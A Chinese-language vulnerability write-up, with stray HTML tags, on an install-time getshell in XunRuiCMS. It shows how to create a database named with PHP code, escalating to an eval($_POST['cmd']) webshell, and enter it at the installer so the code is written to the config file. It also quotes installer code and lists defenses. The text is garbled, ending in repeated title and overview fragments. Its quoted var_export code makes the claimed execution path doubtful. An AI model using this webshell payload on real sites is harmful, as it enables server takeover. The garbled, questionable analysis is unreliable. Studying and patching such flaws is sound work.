迅睿CMS从控制本地数据库名称到Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2>
迅睿CMS（XunRuiCMS）在安装过程中存在一个安全漏洞，攻击者可以通过控制本地数据库名称，将恶意代码写入配置文件，最终实现远程代码执行（RCE）。<\/p>

环境搭建<\/h2>

下载源码<\/strong>：<\/p>

官方下载地址：https:\/\/www.xunruicms.com\/down\/<\/li> <\/ul> <\/li>

搭建环境<\/strong>：<\/p>

使用phpStudy等集成环境搭建<\/li>
PHP版本需兼容迅睿CMS要求<\/li> <\/ul> <\/li> <\/ol>
漏洞复现步骤<\/h2>
准备工作<\/h3>

在本地MySQL中创建一个名称包含恶意代码的数据库：
CREATE<\/span> DATABASE<\/span> `<?<\/span>php phpinfo();?>`<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 安装过程利用<\/h3> 访问迅睿CMS安装界面<\/p> <\/li> 在数据库配置步骤中：<\/p> 数据库名称填写恶意代码：<?php phpinfo();?><\/code><\/li> 填写正确的数据库用户名、密码等信息<\/li> <\/ul> <\/li> 继续安装流程：<\/p> 系统会将数据库名称写入配置文件<\/li> 最终生成包含恶意代码的配置文件<\/li> <\/ul> <\/li> <\/ol> 验证漏洞<\/h3> 检查生成的配置文件（通常是\/config\/database.php<\/code>）<\/li> 访问该文件或相关页面，可以看到phpinfo()<\/code>被执行<\/li> <\/ol> 进阶利用<\/h3> 创建包含webshell代码的数据库：<\/p> CREATE<\/span> DATABASE<\/span> `<?<\/span>php eval($<\/span>_POST['cmd'<\/span>]);?>`<\/span>; <\/span><\/span><\/code><\/pre><\/li> 重复安装过程<\/p> <\/li> 通过POST请求向配置文件发送命令执行<\/p> <\/li> <\/ol> 漏洞分析<\/h2> 关键代码分析<\/h3> 漏洞位于安装程序Install.php<\/code>中：<\/p> 获取用户输入<\/strong>：<\/p> $data =<\/span> $this-><\/span>input<\/span>-><\/span>post<\/span>('data'<\/span>); <\/span><\/span><\/code><\/pre><\/li> 数据库连接验证<\/strong>：<\/p> \/\/ 验证数据库连接 <\/span><\/span><\/span><\/span>if<\/span> (!<\/span>$this-><\/span>db<\/span>-><\/span>connect<\/span>($data['db_hostname'<\/span>], $data['db_username'<\/span>], $data['db_password'<\/span>], $data['db_name'<\/span>], $data['db_prefix'<\/span>], $data['db_port'<\/span>])) { <\/span><\/span> exit<\/span>('数据库连接失败，请检查配置'<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 写入配置文件<\/strong>：<\/p> \/\/ 将配置写入database.php <\/span><\/span><\/span><\/span>$file =<\/span> WRITEPATH<\/span>.<\/span>'config\/database.php'<\/span>; <\/span><\/span>$config =<\/span> array<\/span>( <\/span><\/span> 'hostname'<\/span> =><\/span> $data['db_hostname'<\/span>], <\/span><\/span> 'username'<\/span> =><\/span> $data['db_username'<\/span>], <\/span><\/span> 'password'<\/span> =><\/span> $data['db_password'<\/span>], <\/span><\/span> 'database'<\/span> =><\/span> $data['db_name'<\/span>], \/\/ 恶意代码从这里注入 <\/span><\/span><\/span><\/span> 'dbprefix'<\/span> =><\/span> $data['db_prefix'<\/span>], <\/span><\/span> 'port'<\/span> =><\/span> $data['db_port'<\/span>], <\/span><\/span>); <\/span><\/span>file_put_contents<\/span>($file, "<?php<\/span>\n<\/span>return "<\/span>.<\/span>var_export<\/span>($config, true<\/span>).<\/span>";<\/span>\n<\/span>"<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞原理<\/h3> 安装程序未对数据库名称进行过滤<\/li> 直接将用户控制的数据库名称写入PHP配置文件<\/li> 当配置文件被包含时，其中的PHP代码会被执行<\/li> <\/ol> 利用条件<\/h2> 攻击者能够控制本地数据库名称<\/li> 能够访问迅睿CMS的安装界面<\/li> 安装程序有权限写入配置文件<\/li> <\/ol> 防御措施<\/h2> 临时解决方案<\/strong>：<\/p> 安装完成后立即删除安装脚本<\/li> 检查并清理配置文件中的可疑代码<\/li> <\/ul> <\/li> 长期解决方案<\/strong>：<\/p> 对数据库名称等输入进行严格过滤<\/li> 配置文件应使用INI格式而非PHP数组<\/li> 对写入配置文件的内容进行HTML实体编码<\/li> <\/ul> <\/li> 官方补丁<\/strong>：<\/p> 关注官方更新，及时升级到修复版本<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该漏洞利用迅睿CMS安装过程中对数据库名称过滤不严的问题，通过精心构造的数据库名称实现代码注入。由于安装程序通常具有较高权限，这种漏洞往往能导致严重后果。开发者在编写安装程序时应特别注意用户输入的过滤和验证。<\/p>

迅睿CMS从控制本地数据库名称到Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2> 迅睿CMS（XunRuiCMS）在安装过程中存在一个安全漏洞，攻击者可以通过控制本地数据库名称，将恶意代码写入配置文件，最终实现远程代码执行（RCE）。<\/p>

漏洞复现步骤<\/h2>

漏洞分析<\/h2>

漏洞概述<\/h2>
迅睿CMS（XunRuiCMS）在安装过程中存在一个安全漏洞，攻击者可以通过控制本地数据库名称，将恶意代码写入配置文件，最终实现远程代码执行（RCE）。<\/p>